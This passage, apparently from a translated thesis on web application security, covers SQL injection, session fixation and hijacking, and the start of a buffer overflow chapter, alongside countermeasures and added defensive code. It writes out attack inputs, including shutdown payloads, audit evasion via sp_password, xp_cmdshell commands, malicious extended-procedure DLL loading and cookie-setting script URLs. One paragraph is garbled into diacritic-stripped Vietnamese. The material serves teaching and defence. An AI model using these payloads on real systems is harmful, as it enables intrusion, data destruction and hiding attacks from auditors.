SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'

The statement above is used to learn about the columns of a table. UNION can also be used to learn the SQL Server environment variables.


Example 6.III.4-9: to learn which Server the application is running on:
Username: ';select @@SERVERNAME union select 1--

Resulting error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'KHOAI_NGU' to a column of data type int.

III.5. Attacks based on the INSERT statement


The INSERT keyword puts information into the database. INSERT statements are usually used in cases such as user registration, guestbooks and so on. The ; and -- techniques are used just as with the SELECT statement; the number and types of the entered values must be correct to avoid syntax errors (if the data types cannot be determined, numbers can be entered for everything). Example 6.III.5-1:
SQLString= "INSERT INTO User VALUES ('" & strUsername & "', '" & strName & "', '" & strPassWord & "', " & strLimitSize & ")"


III.6. Attacks based on STORED PROCEDURES


Stored Procedures are used in web programming to reduce complexity in the application and to avoid SQL Injection attacks. A hacker, however, can still abuse Stored Procedures to attack the system. Example 6.III.6-1: the stored procedure sp_login takes two parameters, username and password. If the input is:
Username: nhimmap
Password: ';shutdown--

The stored procedure call becomes:

exec sp_login 'nhimmap','';shutdown--'

The shutdown command stops SQL Server immediately.

III.7. Advanced techniques
III.7.1. Strings without single quotes:


Programmers can protect their applications by removing all quotes, usually by replacing each single quote with two single quotes. Example 6.III.7.1-1:
Function escape(input)
    input = replace(input, "'", "''")
    escape = input
End Function


Clearly this blocks all the attack types above. However, to build a string value without using any quotes, the char() function can be used, as in the following example. Example 6.III.7.1-2:
INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)

Example 6.III.7.1-3 above, although a query containing no single quotes, can still insert a string into the table, and is equivalent to:
INSERT into User VALUES(666,'chris','chris',255)

The hacker can also choose numeric username and password values to avoid quotes, as in the following example. Example 6.III.7.1-4:

INSERT into User VALUES(667,123,123,0xffff)

SQL server automatically converts the numbers to strings.

III.7.2. Two-stage attacks


Even though the application replaces single quotes, SQL code can still be injected. Example 6.III.7.2-1: when registering an account in the application, enter the following username:
Username: admin'--
Password: passofadmin


The application replaces the quote, and the resulting insert statement is:


INSERT into User VALUES(123, 'admin''--', 'password',0xffff)

(but the database stores it as admin'--). Suppose the application lets the user change their password. The ASP code is designed to make sure the user enters the correct old password before entering the new one. The code is as follows:
username = escape( Request.form("username") );
oldpassword = escape( Request.form("oldpassword") );
newpassword = escape( Request.form("newpassword") );
var rso = Server.CreateObject("ADODB.Recordset");
var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
rso.open( sql, cn );
if (rso.EOF)
{
    // wrong old password: error handling omitted in the original
}
// the query that sets the new password:
sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'";

rso("username") is the username value retrieved by the login query, and it is admin'--. The query is now:


update users set password = 'password' where username = 'admin'--'

So the hacker can change admin's password to a value of their own choosing. This situation still exists in most large applications today that use a sanitising mechanism. The best solution is to reject faulty values rather than to repair them. The problem is that some input fields (such as names) must allow these characters, for example O'Brien. The best way to solve this is to disallow the single quote; if that is not possible, remove and replace it as above. In that case the best approach is to make sure that all data placed into a SQL query (including values taken from the database) is strictly controlled. Some applications guard against query injection by limiting the length of the input. With such a limit some attack types cannot be carried out, but it still leaves an opening for the hacker. Example 6.III.7.2-2: suppose both username and password are limited to at most 16 characters. Enter:
Username: aaaaaaaaaaaaaaa'
Password: '; shutdown--


The application replaces the single quote with two single quotes, but because the string length is limited to 16 characters, the single quote that was just added is cut off. The SQL statement becomes:
select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--'

so the username value inside the statement is:

aaaaaaaaaaaaaaa' and password='
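Example 6.III.7.2-2 worked through in code, as an added example (not from the thesis): the escape() of 6.III.7.1-1 is applied before and after the 16-character limit, and a small literal parser checks whether the text outside the string literals still matches the query template. Escaping first lets the truncation remove the doubling quote; enforcing the limit on the raw input first keeps the literal intact. The template and the MAX_LEN value are the ones assumed in the text; query parameters (section III.1) remain the proper fix.

```python
MAX_LEN = 16  # the field limit assumed in example 6.III.7.2-2

# What lies outside the two string literals in the login query template.
EXPECTED_OUTSIDE = ["select * from users where username=", " and password=", ""]


def escape(value: str) -> str:
    """The escape() of example 6.III.7.1-1: double every single quote."""
    return value.replace("'", "''")


def build_login(username: str, password: str) -> str:
    return ("select * from users where username='" + username +
            "' and password='" + password + "'")


def escape_then_truncate(value: str) -> str:
    """Wrong order: the quote added by escape() may be the character cut off."""
    return escape(value)[:MAX_LEN]


def truncate_then_escape(value: str) -> str:
    """Right order: apply the length limit to the raw input, then escape.

    Rejecting over-length input outright is better still, since silently
    cutting it can change the value the user meant to send.
    """
    return escape(value[:MAX_LEN])


def split_sql(sql: str):
    """Split a statement into text outside literals and the literal contents.

    Handles the '' escape inside a literal. Returns (outside_segments,
    literals, terminated); terminated is False when the last literal is
    never closed, which is itself a sign of broken quoting.
    """
    outside, literals = [""], []
    current = None                      # None while not inside a literal
    i = 0
    while i < len(sql):
        ch = sql[i]
        if current is None:
            if ch == "'":
                current = ""
            else:
                outside[-1] += ch
        elif ch == "'" and sql[i + 1:i + 2] == "'":
            current += "'"              # doubled quote: a literal quote char
            i += 1
        elif ch == "'":
            literals.append(current)    # closing quote
            current = None
            outside.append("")
        else:
            current += ch
        i += 1
    terminated = current is None
    if not terminated:
        literals.append(current)
    return outside, literals, terminated


def keeps_template(sql: str) -> bool:
    """True when user data stayed inside the literals of the template."""
    outside, _, terminated = split_sql(sql)
    return terminated and outside == EXPECTED_OUTSIDE


def compare_orders(username: str, password: str):
    """Return (wrong-order query, right-order query) for the same input."""
    wrong = build_login(escape_then_truncate(username),
                        escape_then_truncate(password))
    right = build_login(truncate_then_escape(username),
                        truncate_then_escape(password))
    return wrong, right


if __name__ == "__main__":
    # Inputs from example 6.III.7.2-2 (15 a's plus a quote, then '; shutdown--).
    wrong, right = compare_orders("aaaaaaaaaaaaaaa'", "'; shutdown--")
    print(wrong, keeps_template(wrong))   # False: '; shutdown--' is outside a literal
    print(right, keeps_template(right))   # True
```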

III.7.3. Evading auditing:


SQL Server has a strict auditing facility through the sp_traceXXX family of functions, which can record many events in the database, in particular T-SQL events, logging every SQL statement executed on the Server. If auditing is enabled, all of the hacker's SQL queries are recorded, and from them an administrator can see what is happening and quickly find a solution. But there is a way to counter this, by adding the string sp_password to the T-SQL statement: when that string is encountered, the audit records the following instead:
-- sp_password was found in the text of this event.
-- The text has been replaced with this comment for security reasons.

even when sp_password appears inside a comment. So to hide all attack queries, simply append sp_password after -- as follows:


Username: admin'--sp_password

III.7.4. Using Extended Stored Procedures
III.7.4.1. Using the Extended Stored Procedures built into SQL Server
If SQL Server is installed with default settings, it runs as SYSTEM, the equivalent of full Windows access. master..xp_cmdshell can then be used to run commands remotely:
; exec master..xp_cmdshell 'ping 10.10.1.2'--

Try double quotes (") if single quotes (') do not work. Below are some extended stored procedures that hackers often use to execute commands that reveal information on the victim's machine:

Xp_availablemedia: displays the drives available on the machine
Xp_dirtree: displays all directories, including subdirectories
Xp_loginconfig: retrieves information about the security mode on the server
Xp_makecab: lets the user create archive files on the Server (or of any file the server can access)
Xp_ntsec_enumdomain: lists the domains the server can query
Xp_terminate_process: terminates a process given its PID

III.7.4.2. Using self-made Extended Stored Procedures


Extended stored procedure API l mt chng trnh c mt nhim v n gin l to ra mt DLL extended stored porcedure cha ng on m nguy him. a tp tin DLL ln Server c th dng cc cu lnh, hoc cc k thut giao tip khc nhau c thc hin t ng, nh l HTTP download v FTP script. Mt khi tp tin DLL tn ti trn my ch, th hacker c th to mt extended stored procedure bng dng lnh sau : V d 6.III.7.4.2-1:
sp_addextendedproc xp_webserver, c:\temp\xp_foo.dll

Sau c th thc thi n nh l thc thi extended stored procedure thng thng :
exec xp_webserver

Khi thc hin xong, c th xo bng lnh sau:


sp_dropextendedproc xp_webserver

III.7.4.3. Importing text files into a table

With the bulk insert command, data from a text file can be imported into a temporary table. Example 6.III.7.4.3-1: create a simple table as follows:

create table foo (line varchar(8000))

Then run bulk insert to copy the data from the file into the table. Example 6.III.7.4.3-2:

bulk insert foo from c:\inetpub\wwwroot\process_login.asp

The contents of the process_login.asp page can then be retrieved with the techniques of Example 6.III.7.4-3.

IV. COUNTERMEASURES

In most browsers, characters should be encoded in the URL before they are used. Because SQL Injection attacks rely on error messages, the best defence remains never showing raw error messages to the user: replace them with a page designed by the developer that is shown whenever an error occurs in the application. Check the values entered by users carefully, replacing characters such as ; and so on.

Remove meta characters such as ' " / \ ; and extended characters such as NULL, CR, LF, ... from strings received from:

o data entered by the user
o parameters in the URL
o values from cookies

For numeric values, convert them to integers before executing the SQL query, or use ISNUMERIC to make sure the value is an integer. Use data encryption algorithms.

IV.1. Data validation

Validating data is a complex problem that has often not received adequate attention in applications. The point of data validation is not merely to add a few functions to the application, but to check inputs in a general and fast way that achieves the goal. The following summary discusses data validation, with examples illustrating the issue. There are three approaches to the problem:
1) Attempt to check and modify the data to make it valid.
2) Reject invalid data.
3) Accept only valid data.
Approach 1: hard to implement. First, the programmer cannot know all invalid data, since invalid data takes very many forms.

Second, there is the problem of second-order SQL injection, where the attack is carried by data retrieved from the system. Approach 2: is ineffective in the same situations as approach 1, because invalid data keeps changing along with the development of new attack types. Approach 3: better than the other two, but it faces some limitations when implemented. The best protection is to combine approaches 2 and 3. One example of why 2 and 3 must be combined is the hyphen in a name such as Quentin Bassington-Bassington: the hyphen must be allowed in the definition of valid data, yet the character sequence -- is special in SQL Server. For example, if there is a filter that removes invalid data such as --, select and union, a check function that strips single quotes can still be countered like this:

union select @@version--

Some basic ways to implement data-validation functions. Method 1: replace the single quote:

function escape( input )
  input = replace(input, "'", "''")
  escape = input
end function

Method 2: reject invalid data

function validate_string( input )
  known_bad = array( "select", "insert", "update", "delete", "drop", "--", "'" )
  validate_string = true
  for i = lbound( known_bad ) to ubound( known_bad )
    if ( instr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then
      validate_string = false
      exit function
    end if
  next
end function

Method 3: accept only valid data

function validatepassword( input )
  good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
  validatepassword = true
  for i = 1 to len( input )
    c = mid( input, i, 1 )
    if ( InStr( good_password_chars, c ) = 0 ) then
      validatepassword = false
      exit function
    end if
  next
end function
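The three validation methods above, and the length-truncation problem from section III.7.2, as an added example in Python. This is not code from the thesis: the three functions mirror the VBScript escape(), validate_string() and validatepassword(), the users table and its rows are constructed for the example, and the two login functions contrast building the statement by concatenation with binding parameters, which is the approach that makes the truncation problem disappear because quotes in the input never become part of the statement text.

```python
import sqlite3

# Tokens from the thesis's validate_string() known_bad list.
KNOWN_BAD = ("select", "insert", "update", "delete", "drop", "--", "'")
# Allow-list from the thesis's validatepassword().
GOOD_PASSWORD_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")


def escape_quotes(value):
    """Method 1: double every single quote, like the VBScript escape()."""
    return value.replace("'", "''")


def validate_string(value):
    """Method 2: reject input containing any known-bad token (case-insensitive)."""
    lowered = value.lower()
    return not any(bad in lowered for bad in KNOWN_BAD)


def validate_password(value):
    """Method 3: accept only characters on the allow-list."""
    return all(ch in GOOD_PASSWORD_CHARS for ch in value)


def escape_then_truncate(value, limit):
    """The failure mode of section III.7.2: escaping first and then cutting the
    string to a fixed column width can drop the second half of a doubled quote,
    leaving an unbalanced quote in the final statement."""
    return escape_quotes(value)[:limit]


def demo_db():
    """Constructed in-memory table standing in for the thesis's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.execute("insert into users values ('alice', 's3cret')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable shape: escape, then build the statement by concatenation.
    Works for ordinary input, but the statement text still depends on input,
    so any later transformation (such as truncation) can break it."""
    sql = ("select count(*) from users where username='%s' and password='%s'"
           % (escape_quotes(username), escape_quotes(password)))
    return conn.execute(sql).fetchone()[0] == 1


def login_param(conn, username, password):
    """Hardened shape: bound parameters, so quotes in the input are only data
    and no escaping or truncation step can change the statement's structure."""
    sql = "select count(*) from users where username=? and password=?"
    return conn.execute(sql, (username, password)).fetchone()[0] == 1
```

escape_then_truncate("a'", 2) returns "a'", the dangling quote of section III.7.2; login_param never sees that problem because the database driver, not string manipulation, separates code from data.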

IV.2. SQL Server Lockdown

The thesis also introduces security measures at the database administration level. This is a checklist of tasks for protecting SQL Server:

Determine the methods of connecting to the server:
o Use the Network Utility to check that only the network libraries in use are active.
Check all accounts in SQL Server:
o Create low-privilege accounts for applications only
o Remove unnecessary accounts
o Make sure every account has a valid password
Check the objects that exist:
o Many extended stored procedures can be deleted safely. If this is done, also consider removing the .dll files that contain the code of those extended stored procedures
o Delete all sample databases such as northwind and pubs
o Delete unused stored procedures such as master..xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
Check which accounts can access which objects:
o For the accounts an application uses to access the database, grant only the minimum privileges needed to reach the objects it uses.

Check the server's patch level:
o Some attacks, such as buffer overflow and format string, usually target this layer of protection.
Check the sessions on the server.
Change "Startup and run SQL Server" to a low-privilege user account in SQL Server Security.

Remarks:
Chapter 6 shows that validating data before processing it is necessary. Besides validating data, the application should also encrypt data inside the database and should not emit error pages that report SQL syntax errors, so that hackers cannot gather information about the database. The network administrator's work runs in parallel with this.

Chapter 7

SESSION TAKEOVER

Contents:
I. Overview of session IDs
II. Session fixation
III. Session hijacking (stealing the session)

CHAPTER 7: SESSION TAKEOVER

I. OVERVIEW OF SESSION IDs

As mentioned in Chapter 2 section III, a session stores the working state between browser and server. The session ID can be stored in a cookie, embedded in the URL, or kept in a hidden form field. Each storage method has advantages and disadvantages, but in practice the cookie remains the best choice and the safest method. Usually, after the user has been authenticated on the basis of personal information such as username/password, the session ID is treated as a temporary static password for the following requests. This makes the session ID a major target for hackers. In many cases a hacker who obtains a user's valid session ID can enter that user's session. XSS is one attack that can capture a session ID stored in a cookie. This kind of attack is called session hijacking. Attacks on a session are usually carried out in two main ways:
- Session fixation
- Session hijacking

II. SESSION FIXATION

In a session fixation attack, the hacker fixes a session ID for the victim in advance, before the victim logs in to the system. The hacker then uses this session ID to break into the victim's session. Summary of the attack:
Step 1: Establish a session ID. Systems manage sessions in one of two ways:
+ Permissive: any session ID is accepted; if no session exists for it, a new session is created with that ID
+ Restrictive: only session IDs registered in advance are accepted.
With a permissive system the hacker only needs to choose an arbitrary session ID, remember it and reuse it later. With a restrictive system, the hacker must register a session ID with the application. Depending on the session management process, the hacker has to keep the session alive until the victim logs in. Normally a session does not live indefinitely: the system destroys a session automatically if no action is taken for some time (idle time) or when it expires. Hence step 1a: the attacker maintains the session by sending requests to the server.

Figure 7.II-1: Outline of an attack on a user by session fixation

Step 2: Send this ID to the victim's browser. The hacker sends the session ID just created to the user; depending on the application, the session ID can be passed through the URL, a hidden form field, or a cookie. The common attacks are:
o Session ID attack via URL parameter
o Session ID attack via hidden form field
o Session ID attack via cookie
Step 3: Enter the victim's session. After the victim has logged in through the pre-assigned session ID and has not yet left the application, the hacker uses that session ID to step into the victim's session.

Figure 7.II-2: Detailed description of an attack on a user by session fixation.

Next the thesis presents the ways of attacking session IDs in step 2.

II.1. Session ID attack via URL parameter

The hacker sends a link asking the user to log in to the server, with a session ID pre-assigned in the URL. Example 7.II.1-1: http://online.worldbank.com/login.jsp?sessionid=1234

Figure 7.II.1-1: Attack through a URL parameter

1. The hacker opens the bank's online service at online.worldbank.com
2. The hacker receives a session ID from the server identifying the hacker's session, for example 1234.
3. The hacker then finds a way to send a link to some user who has an account at this bank. The link usually leads to the account login page, for example http://online.workbank.com/login.jsp?sessionid=1234, to trick the user into working inside the hacker's session once the user receives the link,

4. The user is fooled and opens the web application through the hacker's link. Because a session ID (the hacker's) is already present, the server does not create a new one.
5. The user continues and logs in with their own information to manage the account.
6. The hacker now enters the user's account without having to log in, since both share the same session.
Remarks: This attack requires that the application create the session ID as soon as the user starts using it. It is easily noticed by the user.

II.2. Session ID attack via hidden form field

This technique is similar to the hidden-field technique: after viewing the page's HTML and seeing that the session ID is kept in a hidden form field, the hacker sends the user a session ID on the URL, or a web page identical to the home page but with the hidden field carrying the pre-assigned value. Remarks: this method is also not very practical and is as easily detected as the previous one.

II.3. Session ID attack via cookie

Using cookies, the hacker has three ways to deliver a session ID to the victim's browser:
- Use a scripting language (JavaScript, VBScript, ...) to set a cookie in the victim's browser.
- Use a <META> tag to set the Set-Cookie attribute
- Use Set-Cookie in the HTTP response header

Specifically:
a) Setting a cookie in the browser with a scripting language: most browsers support client-side scripting languages such as JavaScript and VBScript. Both can set a cookie for the browser by assigning document.cookie. Example 7.II.3-1:

http://online.workbank.com/<script>document.cookie= sessionid=1234; domain= .workbank.com;</script>.idc

In addition, the hacker can set the cookie's lifetime and domain; this method suits permissive systems. For example, any host under .workbank.com can read this cookie value.
b) Using a <META> tag with the Set-Cookie attribute: the application can also set a cookie for the browser with a <META> tag in HTML. Example 7.II.3-2:

< meta http-equiv= Set-Cookie content=sessionid=1234>

Meta tag injection: on systems that check arguments for the <SCRIPT> tag, XSS becomes much harder, so injecting a <META> tag is a fairly effective way to manipulate cookies. The <META> tag is normally placed between

<HEAD></HEAD>, but it is still processed if placed anywhere in the HTML page. Example 7.III-3:

http://online.workbank.dom/<meta%20http-equiv=Set-Cookie%20content=sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT>.idc

This method has the advantage over XSS that it is not defeated in IE (when client-side scripting is disallowed), except for the <META REFRESH> tag.
c) Setting a cookie with the Set-Cookie attribute in the HTTP response header: this sets a cookie for the browser with Set-Cookie in the HTTP header, by way of an attack on the DNS server.

II.4. Countermeasures

First, it should be made clear that defending against session fixation is not the responsibility of the web server, since the server only provides a session management API to the application. Therefore only the application can take measures against this attack.
Measure 1: Prevent login with a pre-existing session ID. In this attack the user logs in through a session ID created in advance by the hacker instead of letting the server create a new one; to prevent it, the application must discard the session ID supplied by the user's browser

at login and always create a new session ID after the user has logged in successfully.
Measure 2: Defend against hackers outside the system. Building the application on the restrictive model (only create a new session ID for the user after successful authentication) means that hackers who are not legitimate users of the system cannot use this attack.
Measure 3: Limit the scope of the session ID
o Bind the session ID to the browser's address.
o Bind the session ID to the user's SSL-encrypted authentication information.
o Delete the session when the user leaves the system or when it expires; this can be done on the server or in the browser (cookie)
o The user should use the logout function to remove the current session, and possibly the session IDs still stored on the system from earlier visits where the user forgot to log out
o Set an expiry time for sessions, so the hacker cannot keep a session alive and use it for a long time.
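Measures 1 to 3 above combined in one server-side session store, as an added example that is not code from the thesis. It follows the restrictive model (an ID the server did not issue is ignored and replaced), rotates the ID on every successful login, binds each session to the client address, and expires idle sessions. The idle timeout, the addresses and the user name are assumed values for the example, and the clock is injectable so the expiry can be exercised without waiting.

```python
import secrets
import time

IDLE_TIMEOUT = 900  # seconds of inactivity before a session dies (assumed)


class SessionStore:
    """Server-side session table: sid -> {user, client address, last activity}."""

    def __init__(self, clock=time.time):
        self._clock = clock
        self._sessions = {}

    @staticmethod
    def _new_sid():
        # 256 bits from the OS CSPRNG; never derived from time or address.
        return secrets.token_urlsafe(32)

    def get_or_create(self, presented_sid, addr):
        """Restrictive model: honour only IDs this server issued, for the same
        client address, and not yet idle-expired.  Anything else is replaced by
        a fresh anonymous session, so a pre-set ID never becomes the victim's."""
        now = self._clock()
        s = self._sessions.get(presented_sid)
        if s is None or s["addr"] != addr or now - s["last"] > IDLE_TIMEOUT:
            if s is not None:
                self._sessions.pop(presented_sid, None)
            sid = self._new_sid()
            self._sessions[sid] = {"user": None, "addr": addr, "last": now}
            return sid
        s["last"] = now
        return presented_sid

    def login(self, presented_sid, addr, user):
        """Measure 1: drop whatever ID the browser presented and issue a new
        one bound to the authenticated user."""
        self._sessions.pop(presented_sid, None)
        sid = self._new_sid()
        self._sessions[sid] = {"user": user, "addr": addr, "last": self._clock()}
        return sid

    def user_for(self, sid, addr):
        """Resolve an ID to a user; None if unknown, wrong address, or expired."""
        s = self._sessions.get(sid)
        if s is None or s["addr"] != addr:
            return None
        if self._clock() - s["last"] > IDLE_TIMEOUT:
            self._sessions.pop(sid, None)
            return None
        s["last"] = self._clock()
        return s["user"]

    def logout(self, sid):
        self._sessions.pop(sid, None)


def fixation_scenario():
    """Replays steps 1-3 of section II against the store: the attacker obtains
    an ID, hands it to the victim, the victim logs in.  Returns what each side
    ends up seeing.  Addresses are constructed for the example."""
    store = SessionStore()
    attacker_sid = store.get_or_create(None, "10.0.0.66")
    # The victim's browser presents the attacker's ID (via URL, form or cookie).
    pre_login = store.get_or_create(attacker_sid, "192.168.1.5")
    post_login = store.login(pre_login, "192.168.1.5", "victim")
    return {
        "victim_got_new_id_before_login": pre_login != attacker_sid,
        "login_rotated_id": post_login != pre_login,
        "attacker_sees": store.user_for(attacker_sid, "10.0.0.66"),
        "victim_sees": store.user_for(post_login, "192.168.1.5"),
    }
```

Either safeguard alone breaks the attack: the address binding replaces the presented ID before login, and the rotation in login() would defeat fixation even on a permissive system that accepted the attacker's ID.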

III. SESSION HIJACKING (STEALING THE SESSION)

Unlike session fixation, here the hacker steals a user's session ID while the user is inside their session. To steal a user's session ID, the hacker can use the following methods:

- Session prediction
- Session brute force
- Using code to steal the session

III.1. Session prediction attack (predicting the session ID)

The hacker must be a legitimate user of the system. After a few logins, the hacker examines the session ID values received, finds the rule by which they are generated, and from it can guess the session ID of the next user.

III.2. Session brute-force attack (brute-forcing the ID)

The hacker can write a program that sends many requests to the server in a short time, each carrying a session ID, to find session IDs that currently exist. Hackers rely on the developers' habit of deriving session IDs from the time or the user's IP address to narrow the search space. Example 7.III.2-1: attack on Register.com. Anyone who registers a domain on Register.com may change their own DNS content. The hacker's goal is to obtain the password of a domain administrator on Register.com. The password change function of Register.com is the weakness the hacker uses. When a user wants to change their password, they click the "Forgot password" link. Register.com then sends an email giving the user a link with a session ID in the URL to authenticate the change.

III.3. Stealing the session with injected code

By injecting code that runs in the victim's own browser, the hacker can trick the user into following a link that steals the user's cookie; this is done through a Cross-Site Scripting flaw. After obtaining the user's session, the hacker enters that session.

III.4. Countermeasures

The countermeasures are the same as those for session fixation and for Cross-Site Scripting, with a few notes: do not assume that the application's session generation algorithm is secure and that nobody can guess it. With a short session ID the hacker can use brute force. But do not assume either that the application is secure because the session ID is long and complex, because the ID's size is no protection if the algorithm is poor.
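The last note above, that length is no protection if the algorithm is poor, as an added example that is not code from the thesis. The audit function gives the statistics a developer can compute from a sample of IDs; the weak generator is a constructed stand-in for the time- and IP-derived schemes mentioned in III.2. The point the run makes is that the weak IDs look statistically perfect (a hash output is uniform) yet carry only log2 of the number of inputs an attacker would enumerate, so the audit is necessary but not sufficient and the generator must draw from a CSPRNG. The IP address, time window and guess rate are assumed values.

```python
import hashlib
import math
import os
import secrets
from collections import Counter


def strong_session_id():
    """32 hex characters from the OS CSPRNG: 128 bits of real entropy."""
    return secrets.token_hex(16)


def weak_session_id(client_ip, timestamp):
    """Constructed weak scheme in the spirit of section III.2: a digest of two
    values an attacker can learn (the address) or enumerate (the second)."""
    msg = f"{client_ip}:{int(timestamp)}".encode()
    return hashlib.sha256(msg).hexdigest()[:32]


def audit_ids(ids):
    """Statistical view of a sample of IDs: length, alphabet size, Shannon
    entropy per character, duplicates and shared prefix."""
    pooled = "".join(ids)
    counts = Counter(pooled)
    n = len(pooled)
    shannon = -sum(c / n * math.log2(c / n) for c in counts.values())
    return {
        "min_length": min(len(i) for i in ids),
        "alphabet": len(counts),
        "bits_per_char": shannon,
        "duplicates": len(ids) - len(set(ids)),
        "common_prefix": len(os.path.commonprefix(ids)),
    }


def effective_bits(distinct_inputs):
    """Entropy the ID really carries: log2 of the number of generator inputs
    an attacker who knows the scheme would have to try, whatever the length."""
    return math.log2(distinct_inputs)


def brute_force_seconds(bits, guesses_per_second, live_sessions=1):
    """Expected time to hit one of live_sessions valid IDs by blind guessing."""
    return (2 ** bits) / (2 * live_sessions) / guesses_per_second


def compare(window_seconds=3600, sample=200):
    """Audit both generators and put the statistics beside the real entropy."""
    strong = audit_ids([strong_session_id() for _ in range(sample)])
    weak = audit_ids([weak_session_id("203.0.113.7", 1_700_000_000 + t)
                      for t in range(sample)])
    return {
        "strong_bits_per_char": strong["bits_per_char"],
        "weak_bits_per_char": weak["bits_per_char"],
        # 16 hex symbols in 32 positions, all random.
        "strong_effective_bits": effective_bits(16 ** 32),
        # Address known, one-second resolution inside the window.
        "weak_effective_bits": effective_bits(window_seconds),
    }
```

Both generators score close to 4 bits per hex character in audit_ids(); only effective_bits() separates 128 bits from under 12, and brute_force_seconds(12, 1000) is a fraction of a second against any realistic request rate.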

III.1. Differences between session hijacking and session fixation

Timing
  Session hijacking: attacks the victim's browser after the victim has logged in to the system.
  Session fixation: attacks the victim's browser before the victim logs in to the system.

Impact
  Session hijacking: the hacker gains access once.
  Session fixation: the hacker gains access once, temporarily, or for a long time, each time the victim's session is entered.

Session maintenance
  Session hijacking: no session maintenance is required.
  Session fixation: the session may have to be kept alive until the victim logs in.

Attack vectors
  Session hijacking:
    1. Exploit an XSS hole on the server
    2. Capture the session ID in the HTTP Referer header sent to another web server
    3. Exploit network traffic (links to the server that are not encrypted)
  Session fixation:
    1. Ask the user to log in to the system through a modified link or form
    2. Exploit an XSS hole on any server in the victim's domain
    3. Exploit a <META> tag hole on any server in the victim's domain
    4. Add a server able to create session IDs, in the same domain as the server, to the victim's DNS server
    5. Modify network traffic

Targets
  Session hijacking: the server; the communication link.
  Session fixation: all servers in the target domain; the DNS server; the server; the communication link.

Remarks:
This attack technique exploits laxity in the application's session management and at the same time targets users who are careless when accessing a web application. Of the chapters so far, only XSS and session management exploit the user's lack of caution.

Chapter 8

BUFFER OVERFLOW
Contents:
I. Concept
II. Memory layout
III. Ways of causing buffer overflow through web applications
IV. Countermeasures

CHAPTER 8: BUFFER OVERFLOW

I. CONCEPT
Buffer overflow had seemed to be a hole in UNIX security for many years, but it was only publicised after Dr. Mudge's discussion in the 1995 paper "How to write a buffer overflow exploit"(1). With the buffer overflow technique, a large amount of user-supplied data exceeds the memory initially allocated by the application, which pushes the system into a memory overflow state and can even allow arbitrary code to be injected. If the application is configured to run as root, the attacker can act as the web server's system administrator. Most of the problems stem from poor programming practice, notably carelessness in checking the size of input data. Example 8.I-1:

#include <string.h>

/* Deliberately unsafe: strcpy() copies until the NUL terminator of ch,
   with no regard for the 256-byte capacity of buffer. */
void func(char *ch)
{
    char buffer[256];
    strcpy(buffer, ch);
}

The buffer is allocated only 256 bytes, but if in func the buffer receives 257 characters from ch, a buffer overflow occurs.

Buffer overflow exploitation is considered one of the most classic hacking techniques. This chapter is divided into two parts:
Part 1: memory layout, stack, function calls, shellcode. Introduces the memory layout of a process, the operations on the stack memory when a function is called, and the basic technique of building shellcode, the code that spawns a command-line interface (shell).
Part 2: the buffer overflow exploitation technique. Introduces the basic buffer overflow technique, the organisation of shellcode, determining the return address and the shellcode address, and how the shellcode is passed to the vulnerable program. The technical details illustrated here were carried out on Linux x86 (kernel 2.2.20, glibc-2.1.3), but in theory they apply to any other environment.

II. MEMORY LAYOUT:

Figure 8.II-1: Memory layout

Every executing process is given the same virtual (logical) memory space by the operating system. This space consists of three regions: text, data and stack. Their meaning is as follows:
- The Text region is fixed and contains the executable instructions and read-only data. It is shared between processes executing the same program file and corresponds to the text segment of the executable. Data in this region is read-only; any attempt to write to it causes a segmentation violation.
- The Data region contains initialised and uninitialised data. Global and static variables are kept here.
- The Stack region is memory reserved while the program runs to hold the values of a function's local variables, the call arguments, and the return value. The stack is operated in a "last in, first out" (LIFO) manner, with PUSH and POP as the two most important instructions.
Within the scope of this writing, the thesis concentrates on the stack region.

II.1. Stack
The stack is the memory region used to hold a function's parameters and local variables, the EBP value (the address of the bottom of the stack frame) and the return address. Variables are allocated from high memory to low memory. The stack works on the last-in-first-out (LIFO) principle: the values pushed onto the stack last are the first to be popped.

II.2. Push and Pop

The stack grows from top to bottom (from high memory to low memory). The ESP register always points to the top of the stack (the lowest address in use).

Figure 8.II.2-1: The stack

PUSH a value onto the stack

Figure 8.II.2-2: Pushing a value onto the stack

(1) ESP = ESP - size of the value
(2) the value is written to the stack

POP a value off the stack

Figure 8.II.2-3: Popping a value off the stack

(1) the value is read from the stack
(2) ESP = ESP + size of the value

II.3. How functions work

A program is divided into many code segments called procedures. Each procedure is responsible for some action of the program. After finishing its task, each procedure calls the next one. After a procedure call, the address following the call instruction is saved on the STACK. Example 8.II.3-1:

Stack before the call:
0x0012FF00
0x0012FF01
0x0012FF02
0x0012FF03
0x0012FF04 ---------------------------- top of stack
0x0012FF05
0x0012FF06
0x0012FF07
0x0012FF08 ---------------------------- bottom of stack

Code:
0x401F2034   call procedure Q    -> procedure Q is invoked
0x401F2035   (next instruction)
0x40209876   procedure Q
0xFFFFFFFF

When the instruction at 0x401F2034 executes, the address space looks like this (the four bytes 40 1F 20 35 of the original figure occupy the slots freed at the top):
0x0012FF00 ---------------------------- top of stack      40
0x0012FF01                                                1F
0x0012FF02                                                20
0x0012FF03                                                35
0x0012FF04
0x0012FF05
0x0012FF06
0x0012FF07
0x0012FF08 ---------------------------- bottom of stack

Thus the address following the call has been pushed onto the STACK. When procedure Q is about to finish its task and is ready to return, the process takes the address saved earlier from the STACK and resumes execution there. This address is called the saved return address. Note: the EIP register always points to the address of the next instruction to execute.

Example 8.II.3-2:

strcpy(one, two);
printf("Okie\n");

Here the return address points at the location in memory of the call to printf, and when strcpy finishes the instruction pointer will point there.

II.4. Shellcode

